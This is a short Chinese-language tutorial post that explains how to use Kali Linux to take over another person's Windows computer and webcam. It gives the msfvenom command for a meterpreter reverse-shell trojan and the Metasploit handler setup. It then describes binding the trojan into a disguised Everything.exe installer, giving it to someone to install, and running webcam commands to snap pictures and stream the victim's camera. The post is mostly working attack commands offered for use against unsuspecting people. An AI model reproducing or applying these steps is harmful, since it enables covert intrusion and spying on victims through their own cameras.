Kali入侵网络摄像头

Kali入侵网络摄像头流程简述

查询Kali攻击机的IP地址 ifconfig

生成一个木马程序 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.24 lport=5000 -f exe -o barry.exe

此时在kali电脑桌面上就生成了一个名为barry.exe与被控机反向连接的程序。

开启监听程序,在kalik 打开 msfconsole

1. msf6>use exploit/multi/hander
2. set payload windows/meterpreter/reverse_tcp
3. set lhost 192.168.31.24
4. set lport 5000

5. run 等木马上线并运行即可。

生成的木马在被控机上是很容易被发现而且不会被安装的,此进需要将barry.exe程序进行绑定处理,本例以绑定Everything.exe程序为例。然后再在被控机上安装即可。【准备好barry.exe Everything.exe xx.ico 用安防文件捆绑器

用安防文件捆绑器将以上三个文件进行捆绑。生成一个aqiyi.exe的有木马的Everything

将这个绑定好的aqiyi.exe给别人安装即可。当被控机安装以后就可以发现已经上线了,

– webcam_list //查询有哪些摄像头
– webcam_snap -i 1 //截图
– web_stream -i 1 //打开摄像头

转载请注明出处:  https://www.cntworld.cn
智能工控 » Kali入侵网络摄像头

发表回复

提供最优质的资源集合

立即查看 了解详情